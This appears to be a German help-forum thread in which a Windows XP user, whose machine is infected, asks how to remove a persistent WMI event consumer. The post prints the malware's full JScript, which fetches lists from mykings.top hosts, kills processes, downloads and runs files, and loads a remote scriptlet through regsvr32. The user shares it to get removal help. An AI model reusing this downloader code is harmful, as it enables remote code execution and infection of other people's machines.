Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

 
Alt 23.05.2017, 12:27   #1
Heul
 
ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer - Unglücklich

ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer



Der Benutzername ist Programm... bitte... ich weiß nicht mehr was ich machen soll.

Windowx XP
So... seit 3 Tagen versuche ich dieses elende Drecksteil los zu werden.
Es kommt aber nach mehreren Stunden IMMER wieder vollkommen unabhängig von dem was ich gerade tue.

Es wird NICHT!!! von Malwarebytes/DrWeb/ADWCleaner usw erkannt.
Ich kann es mit Hilfe von dem Progi Autoruns in der Spalte WMI löschen wenn es wieder erscheint.

fuckyoumm2_consumer
Das script sieht so aus:

Code:
ATTFilter
var toff=3000;var url1 = "hxxp://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="hxxp://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
         
Eine Log Datei wird in C:\WINDOWS\system32\wbem\Logs\wbemess.txt angelegt
Momentan zeigt die nur: (Tue May 23 12:09:43 2017.8649656) : NT Event Log Consumer: could not retrieve sid, 0x80041002

Seid heute 9 Uhr ist das Script nicht mehr aufgegangen...
Ich denke aber das es immer noch da ist da ich KEINE antivirus Seite öffnen kann.
virustotal, drweb, malwarebytes egal was ich bekomme immer nur: Fehler: Server nicht gefunden
Alle anderen Seiten funktionieren wie immer.

In der Windows Firewall bei Ausnahmen ist ein Eintrag mit ahpobx erschienen.
Port: 9589 TCP
Löschen hilft nicht da es nach einem Neustart immer wieder kommt.
Ich habe nun einfach den Port auf 1 geändert (Was auch noch nicht wieder geändert wurde)

Die einzigen Programm die etwas finden (Ich mir aber nicht sicher bin ob es damit etwas zu tun hat) sind: Farbar Recovery Scan Tool & TDSSKillerTDSSKiller

FRST & TDSSKiller Scan im Anhang.
Ich heule jetzt weiter...
Bin auch liebend gerne bereit das ganze per Telefon zu besprechen < pure Verzweiflung

 

Themen zu ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer
.dll, antivirus, code, datei, dll, fehler, firewall, log, löschen, neustart, nicht mehr, recovery, rundll, rundll32.exe, scan, script, seite, seiten, system32, tan, virus, win32, windows, windows firewall, wmi




Ähnliche Themen: ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer


  1. .scr Datei (Virus?) über Steam erhalten, habe ich jetzt einen Virus (oder Passwortscanner, etc.)?
    Log-Analyse und Auswertung - 09.06.2015 (3)
  2. 100 Euro Virus / IDP.Trojan.4724C1BC / AVG Anti-Virus nicht aktivierbar
    Plagegeister aller Art und deren Bekämpfung - 22.10.2012 (18)
  3. Ist in dieser Datei ein Virus?/System Volume Information Virus
    Plagegeister aller Art und deren Bekämpfung - 26.09.2012 (7)
  4. Task-manager durch virus blockiert, Polizei-virus
    Log-Analyse und Auswertung - 02.04.2012 (1)
  5. Sicherheitswarnungs Virus, Nach Wiederherstellung ohne Probleme, Virus noch auf dem System?
    Plagegeister aller Art und deren Bekämpfung - 14.02.2012 (9)
  6. Html/Infected.Webpage.Gen2 [virus] gefunden. Quarantäne leer. FW wurde vom Virus aus/eingeschaltet
    Log-Analyse und Auswertung - 19.12.2011 (52)
  7. Anti-Virus Free Edition 2011 - Findet Virus namens Hacktool.QXO
    Mülltonne - 11.11.2011 (0)
  8. Welcher Virus? Anti-Virus startet nicht mehr, MalWare Go
    Plagegeister aller Art und deren Bekämpfung - 07.03.2011 (1)
  9. Virus fährt beim booten mit hoch? genereller Virus
    Log-Analyse und Auswertung - 27.01.2011 (5)
  10. Virus versenden; virus angriff; virus schützen; rache;
    Log-Analyse und Auswertung - 06.12.2010 (10)
  11. per Win XP Virus bekommen, der stark einschränkt. Kaspersky rescue disc benutzt, aber Virus noch da
    Plagegeister aller Art und deren Bekämpfung - 01.11.2010 (30)
  12. AVG Anti Virus free meldet Virus PSW.Generic7.BWMP, Virus läßt sich nicht beseitigen
    Plagegeister aller Art und deren Bekämpfung - 30.10.2010 (21)
  13. Kaspersky Anti-Virus 2011 konnte nicht installiert werden(fataler Fehler, Virus?)
    Antiviren-, Firewall- und andere Schutzprogramme - 15.10.2010 (1)
  14. Virus ja nein?Anti Virus geht nicht mehr!
    Antiviren-, Firewall- und andere Schutzprogramme - 05.08.2010 (23)
  15. Habe ich einen Virus?? Bitte um Hilfe - Virus userinit.exe
    Log-Analyse und Auswertung - 20.04.2010 (8)
  16. Batch-Virus Probleme: VIRUS ALERT! Benötige Hilfe zur vollständigen Reinigung
    Plagegeister aller Art und deren Bekämpfung - 25.08.2008 (15)
  17. not-a-virus:Client-IRC.Win32.mIRC.16 <- Virus oder nicht?!
    Plagegeister aller Art und deren Bekämpfung - 14.07.2005 (8)

Zum Thema ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer - Der Benutzername ist Programm... bitte... ich weiß nicht mehr was ich machen soll. Windowx XP So... seit 3 Tagen versuche ich dieses elende Drecksteil los zu werden. Es kommt aber - ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer...
Archiv
Du betrachtest: ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.